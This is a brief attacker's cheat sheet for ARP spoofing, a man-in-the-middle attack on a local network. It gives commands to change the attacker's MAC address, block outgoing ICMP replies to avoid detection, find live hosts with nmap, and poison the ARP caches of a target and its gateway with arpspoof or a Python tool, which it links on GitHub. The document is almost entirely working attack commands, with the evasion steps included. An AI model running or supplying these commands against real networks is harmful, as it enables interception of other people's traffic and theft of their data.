Change the MAC address of the attacker if we can.

ip link set dev "interface" address xx:xx:xx:xx:xx:xx

Block any ICMP echo reply, redirect & TTL exceeded output.

iptables -A OUTPUT -p icmp --icmp-type 0 -j DROP
iptables -A OUTPUT -p icmp --icmp-type 5 -j DROP
iptables -A OUTPUT -p icmp --icmp-type 11 -j DROP

Run arpspoof.

nmap -sP "IP/subnet" # search the specified subnet for live hosts

arpspoof -i "interface" -t "gatewayIP" "targetIP"
arpspoof -i "interface" -t "targetIP" "gatewayIP"

# Or
python3 arpspoof.py -i "interface" --gatewayip "gatewayIP" "targetIP" -f

Another ARP spoofing tool written in Python.

GitHub - EONRaider/Arp-Spoofer: A pure-Python ARP Cache Poisoning (a.k.a "ARP Spoofing") tool